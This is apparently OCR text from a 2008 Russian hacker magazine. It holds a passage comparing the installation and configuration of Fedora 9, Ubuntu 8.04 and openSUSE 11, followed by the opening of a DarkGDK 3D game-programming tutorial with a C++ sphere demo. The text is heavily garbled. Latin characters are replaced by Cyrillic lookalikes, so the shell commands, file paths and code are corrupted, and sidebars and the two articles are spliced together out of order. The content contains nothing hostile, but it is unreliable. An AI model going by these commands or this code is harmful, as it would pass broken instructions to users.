где можно было выбрать раздел для установки Иі п их (или создать новый 
раздел]. 

В 1 0:56 началасьустановка системы. Программа копировала пакеты и 
производила первоначальную настройку. Потом занялась... удалением 
ненужных пакетов. В первую очередь, это «лишние» языковые пакеты и 
шрифты для неподдерживаемых языков. Зачем сначала устанавливать, 
а потом удалять? В общем, установка была полностью завершена в 1 1 :34 
— итого 52 минуты. Именно столько заняла установка «легчайшего» из 
дистрибутивов. 

В ОРЕЫБиЗЕЛ 

Абсолютным рекордсменом оказалась программа установки орепЗЕІЗЕ 
1 1 . Уже через 1 7 минутя принимал поздравления и благодарности от 
разработчиков дистрибутива. При установке я выбрал графическую 
среду ОІЧОМЕ (она мне больше нравится] и отказался отавтоматичес- 
кой настройки. Как потом выяснилось, я все сделал правильно. Иначе 
бы инсталлятор снес мои Итих-разделы суже установленными Еебога 
и ИЬипШ. Поэтому будь внимателен, если планируешь использовать 
несколько дистрибутивов Итих. 

Н РЕООВА9 



га ітіжтив.од 

Теперьустановим ІЛэипШ. Сразу после загрузки с ИУО пользователю 
будет предложено выбрать устраивающий его язык. Мелочь, а приятно: 
раньше для этого приходилось нажимать <Е2>,такчто одно нажатие 
клавиши мы сэкономили. 

Выбираюустановку на жесткий диск. Появляется оранжевый индикатор 
загрузки. На часах— 10:42. Индикатор подозрительно долго бегаеттуда- 
сюда. О чудо! В 10:48 таки появился графический интерфейс инсталля- 
тора. В старых версияхустановка занимала 15-20 минут, а тут мы только 
6 минут ждали загрузки! Видимо, потому что система основана на ЕіѵеСО 
и грузит все подряд. Ну и зачем мне система печати СИРЗ и поддержка 
ВІиеІюоіФ при установке? А они тоже загружаются. Ладно, проехали. 
Несколько разжму «Далее». Все хорошо, пока мы не доходим до третьего 
шага — запуска программы разметки. Загружалась она целых четыре 
минуты! Все это время система что-то искала на жестком диске. На- 
верное, просматривала все разделы (иху меня двенадцать] и пыталась 
найти наиболее оптимальный для установки СЬипІю. Основательно 



• Шаг 1 : выбор разрешения. Учитывая, что инсталлятор неправиль- 
ноопределил разрешение экрана, первым делом мне пришлосьего 
изменить. В меню Система -> Параметры Оборудование Разре- 
шениеэкрана я выставил 1280x1024, поскольку разрешение 1920x1080 
— чрезвычайно большое даже для моего монитора. Спрашивается, 
почемуутилита изменения разрешения экрана не русифицирована? 
Досадно. А из плюсов можно выделить распознавание моей звуковой 
карты без всяких глюков и правильноустановленный уровень громкости 
(обычно я его изменяю после установки системы, но сейчас этого делать 
не пришлось]. 

• Шаг2: изменение раскладки клавиатуры. Для этой настройки нужно 
перейти по маршруту: Система -> Параметры Оборудование 
Клавиатура. В списке раскладок, какя и ожидал, были ІІ5А и Пиззіа. 
Первую я сделал раскладкой поумолчанию. Чтобы определить способ 
переключения раскладок, нужно нажать кнопку «Параметры раскладки» 
и перейти в группу Иауои!; ЗѵѵМісЬіпд (опять нерусифицированный конфи- 
гуратор!]. Какни странно, подефолту был выбран способ переключения 
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<5Ыі1+5Ы1Т>. Почемутогда он не работал при первоначальной настрой- 
ке системы? В любом случае, я включил привычную мне комбинацию 
клавиш <№І+5ЫТС>. 

Как проверить раскладку? Конечно, запустить текстовый редактор (на- 
пример, 00 ѴѴгкег) и попробовать что-нибудь напечатать. С раскладкой 
все было нормально, но ксвоемуудивлению я обнаружил, что ОрепОіЧісе 
тоже не русифицирован! Об этом мы позаботимся позднее, а пока попро- 
буем получить доступ кѴѴіпсІоѵѵз-разделам. 

• ШагЗ: подключение ѴѴіпбоѵѵз-разделов. Кликаю на иконке «Компью- 
тер» и вижу пиктограммы моих ѴѴіпсІоѵѵз-разделов. Щелкаю на одном 
из них, всплываетокошко ввода пароля гооГ Такбыло и в предыдущих 
версиях Федоры. Но самое интересное, что после ввода пароля раздел 
таки неоткрылся. Все последующие клики ни кчему не привели. Глюк? 
Можетбыть. Конечно, формат /екс/ГзСаЪ знаю, командой шоипС 
пользоваться умею. Запускаю «Терминал» (в меню «Приложения»), вво- 
жу команду 5іі, пароль гооТ а затем команду десбік /еСс/ГзСаЬ. Для 
подключения ѴѴіпсІоѵѵз-разделов добавляю строки вида: 

/с!еѵ/зс1а8 /шпС/сі ѵ^аС сіеГаиІДз О О 

/с!еѵ/зс1а9 /шпС/е ѵГак (беНаиШз О О 

И МОНТИруЮ: 

# тксііг /тпк/сб /тпк/е 

# тоипк — а 

Теперь кѴѴіпбоѵѵз-разделам можно обратиться через каталог /шпс. 
Спасибо и натом, что нетвопросов с русскими буквами, и не пришлось 
прописывать кодировку. Проблема решена несколько радикально, но это 
быстрее и проще, чем устраивать разборки с дпоте-тоипі Интересно, 
какие еще сюрпризы на ровном месте преподнесетФедора? 

• Шаг4: подключаемся к интернету. Опыт подсказывает, что сначала 
нужно настроить доступ в интернет и лишь потом «причесывать» систе- 
му, поскольку могут понадобиться пакеты, которые можно взять только 

в Сети. С настройкой локалки у меня произошел небольшой затык. 
Запускаю зузіет-сопбд-пеіѵѵогк и настраиваю локальную сеть — как 
обычно. Сетка у меня настраивается по ОНСР — особенно ничего делать 
нетребуется. Поверх сетки нужно поднять РРРоЕ-интерфейс (А05І_-со- 
единениедля подключения к интернету). Но вот незадача — локальный 
интерфейс ебпО ни в какую не хотел подниматься. Система не могла 
получить информацию от ОНСР-сервера. 

А причина оказалась в том, что Еебога 9 для управления сетевыми 
соединениями использует ІЧеіѵѵогкМападег. Может, он и хорош для 
беспроводных соединений, но не для настройки классической локаль- 
ной сети! Пришлось заменитьего старым добрым сервисом пеіѵѵогк 
следующими командами: 



# /еСс/іпіС . (З/ЫеДѵтогкМападег зкор 

# /зЪіп/скксопІід --Іеѵеі 35 ЫекѵгогкМападег о:ЕН 

# /екс/іпік . сі/пекѵѵогк зкагк 

# /зЬіп/скксоп^ід --Іеѵеі 35 пекѵѵогк оп 

• Шаг 5: настройка менеджера пакетов уит. Этот менеджер использует- 
ся для установки пакетов. Чтобы его полностью настроить, нужно ввести 
следующие команды: 

# грт --ітрогк /екс/ркі/грт-дрд/* 

# грт -іѵк ТШкр : / /грт. Ііѵпа . огд/1іѵпа-ге1еазе-9 . грт 

# грт --ітрогк /екс/ркі/грт-дрд/КРМ-СРС-КЕУ-Ііѵпа 

Такмы импортировали ключи для стандартных репозиториев Ребога и 
для репозитория Ыѵпа, а также установили сам Ыѵпа (он содержит много 
«вкусненького», втом числе и кодеки, необходимые для воспроизведе- 
ния мультимедиа-файлов). 

• Шагб: установка МРЗ-проигрывателей. Из Федоры, как мы все знаем, 
исключена поддержка популярного формата МРЗ. Но это можно легко 
поправить. Будем считать, что ты уже подключил Ыѵпа, установил соеди- 
нение с интернетом и работаешь как пользователь гооР 

# уит іпзкаіі хттз хттз-трЗ хттз-Паасі2 

# уит іпзкаіі аисіасіоиз аисІасіоиз-рІидіпз-попГгее* 

# уит іпзкаіі гЬ.уЫлтЬох дзкгеатег-ріидіпз-идіу \ 

дзкгеатег-рІидіпз-ЪасІ дзСгеатег-^^тред 

# уит іпзкаіі атагок атагок-ехкгаз-поп^гее атагок- 
ѵізиаіізакіоп 

Не спеши вводить сразу все. Первая команда устанавливает 
старый, но до сих пор популярный проигрыватель ХМ М3. Рели он 
тебе нужен, — установи его. Потом запусти, выполни команду меню 
ОрЧопз Ргеіюгепсез ->Аибіо 1/0 Ріидіпз -> I п р и 1 Ріид і пз и от- 
ключи плагин МРЕО Рауег 1/2/3 Ріасебоібег Ріи д і п [ІіЬгЬ_тр3.5о]. 
Вторая команда устанавливает проигрыватель Аи ба сі о из — не- 
плохой М РЗ-проигрывател ь с современным интерфейсом. Третья 
команда используется для установки РЬуЧптЬох/ОзІгеатег. Ее 
нужно вводить, только если у тебя установлена графическая среда 
ОІЧОМЕ. Если же у тебя КБЕ, тогда нужно инсталлировать Атагок 
(четвертая команда). 

• Шаг 7: установка кодеков. Фильмы всем смотреть хочется, поэтому 
нужно установить программу для их просмотра (МРІауег) и соответству- 
ющие кодеки: 

# уит іпзкаіі тріауег тріауег-диі деско-тесііаріауег 
тепсосбег 
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Федора 9: редактирование /еіс/ізіаЬ 



ІЛэипіи: найденные кодеки 



Команда установит МРІауег, графическую оболочку для него, медиа-пла- 
гин для Рігебох и программу для кодирования видео МЕпсобег. 

Если при запуске МРІауегтыувидишьошибку: 

Тке Шр-кеЪгем орСіоп сап ' С Ье изесі іп а сопіід Іііе. 
Еггог рагзіпд орСіоп 11ір-]теЪге\ѵ=по аС Ііпе 133 



# грш -іѵЪ. Ііпихсіоѵтіоасі. асІоЪе . сот/а<іоЬе-ге1еазе/а<іоЬе- 
ге1еазе-і3 86-1 .0-1 . поагск. грш 

# грш --ішрогС /еСс/ркі/грш-дрд/КРМ-СРС-КЕУ-асіоЬе-Ііпих 

# уигп іпзЕаІІ НазЬ-рІидіп ІіЬІІазЬзиррогС 

Пользователи 64-битных систем набирают: 



— то выполни следующую команду: 

# зесі -і ' з/ 11ір-ЬеЬгеѵ^/#11ір-]теЬгеѵ^/ ' /еЕс/шрІауег/ 
шріауег . сопі 

Если возникнет ошибка « [АО_АЬ8А] ШаЫе До Ііпе! зішріе 
сопДгоІ 1 РСМ 1 , 0», то запусти дтріауег, щелкни на его окне правой 
кнопкой мыши, перейди в Ргеіегепсез Аибіо АѵаіІаЫе бгіѵегз и 
выбери риізе. При возникновении ошибок во время воспроизведения 
видео загляни в Ргеіегепсез Ѵібео и выбери другой драйвер. Также 
рекомендуется удалить Тоіет-Могіііа-Ріидіп: 

# уит гешоѵе ДоДеш-шогрІидіп 



# тксііг -р /изг/ІіЬ/шогіІІа/рІидіпз 

# уит іпзкаіі пзріидіпшгаррег . {І386 ,х8б_64} \ 

риІзеаисііо-ІіЬз . ІЗ 86 ІіЫІазкзиррогД . ІЗ 86 

# уит іпзкаіі Назк-ріидіп 

# тогіІІа-рІидіп-сопТід -і -д — ѵ 

• Шаг9: русификация ОрепОйісе. Для русификации ОрепОШсе достаточ- 
но установить пакет орепоііісе . огд-110п-ги: 

# уит іпзДаІІ орепоТТісе . огд-ІІОп-ги 

• Шаг 10: установка ТТЕ-шрифтов. ТТЕ-шрифты в стиле МісгозоЙ можно 
скачать с сайта согеіопіз.зоигсеіогде.пеі . а потом установить командой: 



• Шаг8: установка ЕІазЬ-плагина. Для установки ЕІазЬ-плагина введи 
следующие команды: 



Должен отметить, что Сульфур загружается достаточно быст- 
ро. Очевидно, из-за новой системы инициализации Орзтагі;, кото- 
рая уже довольно давно используется в ЕПэипш. Напомню, что до 
этого Федора использовала морально устаревшую, но проверенную 
временем систему инициализации іпіі. Работает іпіг превосходно, 
но медленно, потому что сценарии инициализации написаны на 
языке командного интерпретатора ЪазЬ. (по сути, всю работу по 
инициализации выполняет именно ЪазЬ) . Система ирзгап: сама 
занимается инициализацией системы и не перекладывает свои 
обязанности на плечи посторонней программы. За счет этого и 
достигается выигрыш в производительности. 

После принятия исіеѵ и глобального уникального идентифика- 
тора устройств (ІШГО) все дисковые устройства, вне зависимости 
от интерфейса подключения (РАТА, 5АТА, 5С5І), называются /беѵ/ 

5 6.Х, где X — буква. Все современные дистрибутивы поддерживают 
исіеѵ и ЦЦГО. Так что не удивляйся, если вдруг твой старенький ГОЕ- 
винчестер будет назван /беѵ/зба. 



# грт -іѵк тзЕЦсоге-Іопкз-2 . 0-2 .поагск. грт 

В №1^1418.04 

Давай посмотрим, что мы устанавливали почти целый час. При уста- 
новке СНІЛЗ Федора успешно определилась и была прописана в меню 
загрузчика — это радует. Мне не пришлось редактировать его вручную. 
Удивила очень быстрая загрузка дистрибутива. За такую загрузку мож- 
но простить все торможения при установке. 

ІЛэипіи значительно проще «довести до ума», чем Федору. Во-первых, 
она правильно определила разрешение монитора. Во-вторых, поумол- 
чанию используется комбинация клавиш <А11+5Ык> для переключения 
раскладок. Если тебе эта комбинация клавиш не подходит, можешь ее 
изменить также, как мы это делали в Федоре. В-третьих, в Іббипіи нет 
непонятных проблем с монтированием ѴѴіпбоѵѵз-разделов. Фактичес- 
ки, можно сразу приступить к настройке интернета и установке кодеков. 
В-четвертых, если в Еебога нужно установить дополнительные пакеты 
локализации (с этим, надеюсь, ты справишься сакм],то в ІЛэипіи с 
локализацией все намного лучше. 

• Шаг 1 : настройка интернета. Для настройки АИЗИ-соединения нужно 
ввести команду «зибо ррроесопі». Процесс настройки очень прост, по- 
этому обойдемся без моих комментариев. Обычно сетевой интерфейс на- 
страивается на автоматический запуск вместе с системой. Если ты хочешь 
подключаться к интернету ручками, то для соединения используй команду 



ХАКЕР 10 /118/ 08 



► юз 





Программа установки орепЗІІЗЕ 1 1 



ѴѴіпсІоѵѵз-раздел ы, кодеки, Еіазб-плагины и т.д. 

• Шаг 1 : установка разрешения монитора. Непонятно почему, 
но для моего 19-дюймового монитора орепЗІІЗЕ посчитала 
оптимальным разрешением — 800x600. Пришлось пе- 
рейти в раздел Компьютерѣ ѴаЗТ -> Графическая карта и 
монитор — и установить требуемое разрешение. 

• Шаг2: параметры клавиатуры. Для изменения пара- 
метров раскладки клавиатуры нужно выбрать Компьютер 
ѣ Приложения Ѣ Система Ѣ Клавиатура. Мне вообще 
ничего не пришлось изменять, поскольку по умолчанию 
была выбрана комбинация < СігІ+ЗЬ ібі: > . 

• ШагЗ: настройка интернета. Запусти конфигуратор 
УаЗТ и перейди в группу «Сетевые устройства». Выбери 
сетевое устройство, которое ты хочешь настроить — 05Е- 
модем, обычный модем, 1 5 О N и т.д. 

• Шаг4: проверка Рі гебох. Запусти Еігеіюх и введи в стро- 
ке адреса аЬоиС :р1идіпз. Ты получишь информацию 
обо всех установленных плагинах. ЕІазЬ-плагин, как и 
многие другие, есть в списке по умолчанию. 

• Шаг 5: кодеки. Здесь все просто, как и с ІІЬипІи. До- 
статочно открыть любой фильм, и система сама загрузит 
необходимые кодеки из интернета. 

• Шаг 6: ѴѴі псіоѵѵз- разделы. К сожалению, орепЗІІЗЕ не 
увидела мои ѴѴі псіоѵѵз- разделы, поэтому пришлось вруч- 
ную редактировать /еСс/НзСаЬ. 

г выводы 

Из недостатков Еебога 9 можно выделить глюки в про- 
грамме установки, а также большой объем ручной работы 

— чтобы сделать из дистрибутива «конфетку», предстоит 
потрудиться. Не говоря уже о проблемах с локализацией. 
Намного проще настраивается ІЛэипШ: учитывая скорость 
еезагрузки, вполне можно закрыть глаза на самуюдолгую 
установку. Наконец, орепЗІІЗЕ 1 1 установился всего за 17 
минут, но качественных отличий от версии 10.3 я не обнару- 
жил (кроме миграции на КОЕ4]. 

При этом ИбипШ остается самым «легким» дистрибутивом 

— занимает всего 2,3 Гб послеустановки. Федора и орепЗІІЗЕ 

— 3,0 и 3,2 Гб, соответственно. 

Если тебе нравятся шаманские заклинания, работа с напиль- 
ником, молотком и паяльником, выбирай Федору. Но может 
тогда лучше посмотреть в сторону СепФо или Зіаскѵѵаге? 

Если хочется минимум головной боли (или комп не отличается 
«умом и сообразительностью»), тогда твой выбор — ІЛэипІю. 
«Середнячком» в этой компании выступаеторепЗПЗЕ. Хотя, 
субъективно, мне версия 10.3 понравилась больше. ЗЕ 



> ІП^О 

• За быструю загрузку 
ПЬипііі можно про- 
стить все торможения 
при установке. 

• орепЗІЭЗЕ 1 1 уста- 
новилась всего за 1 7 
минут. 

• Когда в орепЗІІЗЕ 
понадобилось смон- 
тировать ІЧТЕЗ’ный 
раздел, в /еСс/ 
ізСаЪ я указал тип 
файловой системы 
«пЫіз-Зд» и опции 
монтирования: 
«сІеНаиШз , п1з=иС 
±8 , ишазк=0 07 , ді 
<3=4 6»- 



«роп сізі -ргоѵісіег», а для отключения — «роЗЗ». 

• Шаг2: установка кодеков. В состав ІЭЬипІш входитау- 
дио-проигрыватель РЬуЮтЬох и видео-проигрыватель 
Тоіет. Этих программ вполне хватает для воспроизведе- 
ния мультимедиа-файлов, поэтому ничего доустанавли- 
вать мы не будем, кроме, конечно, кодеков. Ихустановка 
в ІЭЬип1:и очень проста. Достаточно открыть мультиме- 
диа-файл (лучше сразу открыть фильм), — появится 
предложение найти подходящий кодек. Затем нужно 
выбрать все доступные кодеки и нажать заветную кнопку 
«Установить». 

• ШагЗ: установка ЕІазЬ- плагинов. Вместе с кодеками 
будут установлены и все необходимые для воспроиз- 
ведения видео ЕігеФх-плагины. Останется установить 
только пакет Оазітріидіп-попіігее для воспроизве- 
дения ЕІазЬ-роликов: 

# арС-деС іпзСаІІ ОазЬрІидіп-попНгее 

Собственно, это все, что нужно сделать для подготовки ІІЬипШ 
к работе. 

НОРЕЫЗиБЕЛ 

Не будем делать для орепЗІЭЗЕ исключений. Прой- 
демся по тому же списку — разрешение, раскладка, 



ВДРІі&п Чр™1 
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ЮРИЙ «ѴЕІВЕМВО» ЯЗЕВ 



ѴА2ЕѴ50гТ@Сп І..СОМ / 



ТЕМНОЕ! 
ИСКУССТВО 
ИГРОДЕ/ 






РАЗРАБАТЫВАЕМ ВЫСОКОПРОИЗВОДИТЕЛЬНЫЕ ГРАФИЧЕСКИЕ ДВИЖКИ 



С ПОМОЩЬЮ БИБЛИОТЕКИ ОАРКООК 





Считается, что разработка компьютерных игр требует долгого изучения 

разных АРІ, кучи знаний и привлечения труда множества программистов. 

. 1 

Отчасти так и есть, но появившаяся недавно библиотека Оагк СОК (Сате 



іііііі I I 



I А N1 ИТ! I 






НШІ 



Й I 1 Л 1 І.Л 



Оеѵеіортет Кк) позволит тебе сократить время и объем изучаемого в 
риала — и сразу же перейти к созданию мощных ЗО-движков. 
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мате- 

іілніі 
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^ ЧЕРЕЗ ТЕРНИИ К ЗВЕЗДАМ, ИЛИ КАЖДОМУ СВОЕ 

Речь пойдето детище компании с говорящим названием «ТЬе Оате 
Сгеаіюгз». Славится эта шарага, в первую очередь, своей модификаци- 
ей бэйсика в лице Оагк ВА5ІС (ребята заточили языкспециально под 
разработку игр). Широким массам компаниятакже известна продуктами 
для разработки игр без программирования, кактакового (например, РР5 
Сгеаіюг, ТЬеЗО Сатетакег]. 

ОагкбОК — это библиотека с функциями, работающими поверх ОігесОС. 
Самостоятельной ценности она не представляет, нуждаясь в подключении к 
компиляторуѴІ5иаІС++2008 (работаеттолькос9-ой версией). 



Тутты вполне можешь сказать: «Нафига мне нужна эта ОагкбОК, когда есть 
несложный в освоении Оагк Вазіс?». Не соглашусь. На вкус, цвети люби- 
мый языкпрограммированиятоварищей нет — лично меня отОагк ВА5ІС 
отталкивал именнототфакт, что он основан на Бейсике. 

Вдобавок, взгляни на таблицу релевантности частоты кадров, которая взята 
с сайта авторов. 

В этой таблице показана частота кадров, соответствующая тестам, прове- 
деннымдля ОагкООКи Оагк ВА5ІС. ООКлидируетво всех! Из плюсовстоит 
отметить и время компиляции (благодаря Ѵізиаі С++). А использование 
Си++ вместо бейсика позволило в полной мере применить концепцию ООП, 
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структуры, а также механизмы управления памятью (ссылки, указатели, 
еіс), присущие этому языку. 

В ИНСТАЛЛЯЦИЯ 

Надеюсь, ты уже установил себе Ѵізиаі С++ 2008? Сразу рассмотрим про- 
цесс инсталляции библиотеки. В нем есть неожиданные моменты. Во-пер- 
вых, в твоей системе обязательно должен быть МісгозоГСОігесіХ 9.0 БОК. 
После распаковки и запуска инсталляции на первый увиденный вопрос 
ответь отр и цател ьн о , — и н а ч е тебя отп ра вят н а са йт тол ько что у п о м я нуто й 
организации. Следующий вопрос испрашивает нашего разрешения хотя 
бы один раз запустить систему Ѵізиаі С++. Советую проделать этодействие: 
ничего плохо не произойдет (хорошего тоже]. Затем — смело отвечай 
утвердительно. Начнется инсталляция, которую ты успешно пройдешь и 
без меня. 

После ее завершения можешь за пустить студию и убедиться, что в визардах 
отсутствуют мастера создания проектов с использованием библиотеки. 
Добавь их, проделав следующие действия. Открой папку, куда установлена 
студия, в ней — подпапку ѴС, затем — Ехргезз и, наконец, — ѴСРго]есІ. У 
меня получился такой путь: Б: ХРгодгаш Рі1ез\Місгозо1:б Ѵізиаі 
ЗСиЪіо 9 . 0\ѴС\Ехргезз\ѴСРгсдесСз. Находясь в этой папке, создай 
подпапку, название которой будет группой проектов в студии. После чего, 
уже в этой папке, создай еще одну, которая будет подгруппой для визардов. 
Я назвал их соответственно: ѴѴкагсІз и ОагкООК. Теперь эти самые визарды 
надо сюда скопировать. Они находятся в папке, куда установлена Иагк 
ОИК — в подпап кахѴѴкагсІз, Рі1ез(в моем случае путь такой: В: ХРгодгаш 
Рі1ез\ТЪе Сате Сгеабогз\Рагк ОРКЛМізагЪзХРіІез]. Просто ско- 
пируй все имеющиесятам файлы в ранее созданную директорию. Можешь 
проверить: запусти компилятор и создай проект нового типа. 

Ага, ошибка! Закрывай студию. Сейчасты увидишь, каклегко можно ре- 
шить проблему (если небылоошибки, значит, утебя — английская версия 
операционки; респекттебе какреальномуанглоязычному пацану, можешь 
смело про пустить этот абзац). Чтобы исправить ситуацию, создай в папке 
пользователя (например, С : ХРосишепСз апсі 8ебСіпдз\имя юзера\] 
следующие каталоги и подкаталоги: Му РосишепСзХ Ѵізиаі ЗбиЪіо 
2008\Рагк ОРК. Затем скопируй сюда содержимое подпапкиМзагЪз\ 
РгсдесСз той папки, куда установлена библиотека ОйК. 

Все, теперь проекты создаются, убедись лично. 

Н ПЕРВОЕ ИСПЫТАНИЕ 

Предлагаю сначала испытать полученный «аппарат». Затем вкратце рас- 
смотрим нетолько функциональность созданной «аппаратом» программы, 
но и некоторые другие остро необходимые при разработке мало-мальски 
крутой игры функции и методы. 

Запусти Ѵізиаі С++, если ранее этого не сделал. Создай новый проект. В 
окне выбора шаблона для проекта разверни пунктѴѴкагсІз, в котором выбе- 
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Наш код 

#іпс1ис!е " БагкСБК . к" // заголовочный файл 
ѵоісі БагкСБК ( ѵоісі ) //точка входа — главная функция 
{ 

ЪЪЗупсОп ( ) ; // берем перерисовку экрана под свой 

контроль 

ЪЪЗупсКабе ( 60 ) ; // устанавливаем частоту 
перерисовки экрана 

ЪЪКапЪоті 2 е ( ЪЪТітег ( ) }; // инициализируем 
счетчик случайных чисел 

Тог ( іпТ і = 1 ; і < 50; і + +) { 

ЪЪМакеСЪд есТЗрЪеге ( і, 1 ) ; // создаем сферу 
ЪЪРозіТіопСЪфесТ ( і, ЪЪКпЪ (20), 

ЪЪКпЪ ( 20 ) , ЪЪКпЪ ( 20 ) ) ; 

//позиционируем ее 

бЬЗсаІеОЬз есб ( і, 10 0 + ЪЪКпЪ ( 40 0 ) , 

100 + сІЪКпсІ ( 400 ) , 100 + ЪЪКпЪ ( 400 ) ) ; 

// изменяем размер 

ЪЪСоІогОЪзесТ ( і, ЪЪКдЪ ( ЪЪКпЪ ( 255 ) , 

ЪЪКпЪ ( 255 ) , сІЪКпсІ ( 255 ) ) ) ; 

// устанавливаем цвет 

ЪЬЗеТСЪф есТЗресиІагРомег ( і, 255 ); 

// устанавливаем отражающее свойство материала 
ЪЪЗеТО^есТАтЪіепТ ( і, 0 ); 

// отключаем окружающий свет 

} 

ЪЪРозіТіопСатега ( 10, 10, —20 ) ; 

// позиционируем камеру 
мЪіІе ( ЬоорСБК ( ) ) 

{ // пока программа может работать 

ЪЪТехТ (0,0, "Юзе ТЪе ир апЪ Ъоѵлі аггоѵт кеуз Со 
тоѵе ТЪе сатега" ) ; 

// выводим текст 

ІТ ( ЪЪЪрКеу ( ) ) // нажата ли клавиша ВВЕРХ 
ЪЪМоѵеСатега ( 1 ) ; // перемещаем камеру 

ІТ ( ЪЪБошіКеу ( ) ) // нажата ли клавиша ВНИЗ 
ЪЪМоѵеСатега ( -1 ) ; // перемещаем камеру 

Тог ( ІпТ і = 1; і < 50; і + + ) 

ЪЪКоТаТеСЪд есТ ( і, ЪЪСЪд есТАпдІеХ ( і ) 

+ 0.1, ЪЪСЪдесТАпдІеУ ( і ) +0.2, 
ЪЪСЪдесТАпдІег ( і ) +0.3); 

//вращаем каждую сферу 

ЪЪЗупс ( ) ; // перерисовываем экран 

} 

Тог ( ІпТ і = 1; і < 50; і + + ) 

ЪЪБеІеТеСВДесТ ( і ) ; // удаляем каждую сферу 
геТигп; 
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На диске лежит 
полный исходный 
код игры ОагкНоЬоЕ 
Для компиляции 
нужны : Ѵі 5 и а I С++ 
2008 Ехргезз ЕсІіЕоп, 
ОігесОС 9.0 ЗйК, Оагк 
60 К. 




о іггіо 

Если тема тебя 
заинтересовала, 

— сообщи об этом 
автору. Продолжим 
развитие хакерского 
игропрома! 




> Ііпкз 

Если в лом вставлять 
диск, можешь скачать 
исходнике — 
ѵѵѵѵѵѵ.хакер.ги . 



ри подпункт ОагкСОК— иерархиятакая, какой мы ее создали. 
Тыувидишьтри возможныхзаготовки: ОагкСОК — Сате, Оагк 
ОИК — 2й Затеи ОагкООК — Зй Оате. Каждая генерирует 
п роект соответствую щего ти п а . Та к ка к м ы хоти м создать трех- 
мерную игру, то в качестве шаблона для своей новой програм- 
мы выбери ОагкСОК — ЗОСате. Послетого, как проект будет 
создан, открой его исходный код, дважды щелкнув на файле 
Маіп . ерр в обозревателе решения. Сейчас мы приступим к 
исследованию кода, сгенерированного мастером (смотри код 
на врезке]. 

Н РАССМОТРИМ КОД, ИЛИ РАЗБОР ПОЛЕТОВ 

В первой строчке подключается заголовочный файл, который 
используется во всех приложениях Иагк ОИК. В отдельных 
случаях вместе с ним подключаются другие заголовочные 
файлы, но этот — всегда. Можно сказать, он подобен міпсісжз 
. Ъ в приложениях на Си++. После подключения заголовочного 
файла, какв обычных Си-программах, идет главная функция 
—точка входа в программу. В Оагк-приложениях нет функции 
Маіп или міпМаіп, зато есть та кая — ОагкСОК. С вызовом 
следующей функции мы как бы сообщаем системе, что берем под 
свой контроль перерисовку экрана (функция сІЪЗупсОп]. Далее 
вызывается функция (ЗЬЗупсКаСе с параметром 60. То есть, мы 
хотим, чтобы частота перерисовки экрана по возможности была 
равна этомузначению. В параметре передается максималь- 
ная частота, но она необязательно будеттакой. Все зависит от 
мощности компьютера, на котором запущена программа. Затем 
идет функция сЗЬКапсіошіге — инициализатор механизма слу- 
чайныхзначений. Она нужна, чтобы при каждом последующем 
запуске программы снова генерировалисьзначения. Пара- 
метром для нее служит функция йЬТішег, которая возвращает 
системное время, измеряемое в миллисекундах, начиная со 
старта операционной системы. В следующем цикле мы создаем 
и изменяем свойства нескольких сфер (в данном случае — 49]. 

По именам вызываемых функций видно, какие свойства они 
изменяют (ниже мы рассмотрим их более подробно]. 

После цикла вызывается функция (ІЪРозіСіопСатега. Она 
проводитинициализацию камеры, а именно — устанавливает 
ее позицию. В качестве параметров передаем ей координаты 
по всемтрем осям. Затем начинается основной цикл про- 
граммы. Условие цикла — функция ЬоорОРК. Она возвращает 
единицу, пока программа может функционировать, и ноль 
— когда произошел какой-то сбой или пользователь просто 



закрыл приложение. Втеле цикла вызываются несколько 
функций. Нам надо их рассмотреть. Первая вызываемая 
здесь функция (ІЬТехС выводиттекст (переданный в третьем 
параметре] в позиции, заданной первыми двумя парамет- 
рами (соответственно, координата х — первый параметр, и у 

— второй). Далее идут два условия проверки нажатия клавиш 
«стрелок»: ВВЕРХ и ВНИЗ (функции сІШрКеу и (ІЪРоѵтКеу]. 
В результате выполняется функция приближения и отдаления 
камеры — йЬМоѵеСашега. В качестве параметра ей пере- 
дается шаг перемещения — соответственно, положительное 

и отрицательное числа. Потом начинается цикл, который по- 
ворачивает все ранее созданные сферы с помощью функции 
сіЬКоСаСеОЬз есС. Ей передаются: номер объекта и три пара- 
метра: углы поворота по соответствующим осям. И последняя 
вызываемая в циклемМІе функция (сіЬЗупс] перерисо- 
вываетокно приложения со всеми имеющимися объектами. 
После завершения цикла надо подчистить за собой ресурсы, 
удалив все объекты. Что мы и делаем в цикле іюг посредством 
специальной функции сіЬВеІеСеОЬзесС, которой в качестве 
параметра передается номер объекта. И последней строчкой 

— возвращаемуправлениеоперационной системе. 

Ну, теперь откомпиль и запусти программу. Работает? Конечно, 
работает! Впечатлен? Взгляни еще раз на код и представь, 
сколько надо бы было писать под «голый» ОігесіХ, чтобы 
получить тотже результат (смотри скриншот«Запущенное 
демо-приложение»). 

Да, здорово, но это далеко не предел для Оагк ОРК! Она также 
позволяет легко загружать анимационные объекты вместе с 
анимацией, и, естественно, циклически проигрывать ее. Но 
обо всем по порядку. Думаю, при рассмотрении первой про- 
граммыутебя появились вопросы. Попробую ответить на них. 

0 ОТВЕТЫ НАТВОИ ВОПРОСЫ 

В процессе создания сферы в функцию 
ОЬМакеОЬзесСЗрЬеге (внимание на первый цикл!) переда- 
ется два параметра. Первый — циклически увеличивающаяся 
переменная і и второй — константа 1 . Со вторым параметром 
все ясно (задает размер создаваемой сферы]. Ана первом ос- 
тановимся подробнее. Он задаетимя для объекта — кданному 
объекту можно будет обращаться по этому имени на протя- 
жении всей последующей программы. Получается такое вот 
числовое имя, и это удобно — например, в каждой итерации 
цикла можно присваивать имена объектам по порядку, ис- 
пользуя для этого переменную цикла (как в рассматриваемой 
программе). Имена необязательно должны идти по порядку, 
но, следуя определенному ряду, ты избавишь себя оттого, 
использовал несколько раз одно ито же имя (число]. Если 
такой эпизод будет иметь место в программе, ты недосчи- 
таешься объектов — из-за того, что произойдет перезапись 
старого объекта новым. Ситуацию может усложнить тот факт, 
что для разныхтипов объектов используются одинаковые 
числа. Так, ты можешь создать сферу с именем «1 » и текстуру 
стаким же именем. Но заморачиваться с цифрами не всегда 
удобно и приятно. Поэтому можно просто объявить константу, 
которая будет именем для определенного объекта, и присво- 
ить ей нужную цифру. Допустим, сопзС іпС шап = 1. Таким 
образом, объявлена константа шапдля объекта, соответс- 
твующего этому названию. И ты уже никогда не забудешь, 
к чему относится цифра «1». Затем, какяуже говорил, идут 
функции, настраивающие свойства сферы. Первая из них, 
(ТЬРозіСіопОЬзесС, естественно, задает позицию. Ей пере- 
даются такие параметры: имя объекта (цифра) и три рандом- 
ных числа, играющих роль координат потрем осям. Каждое из 
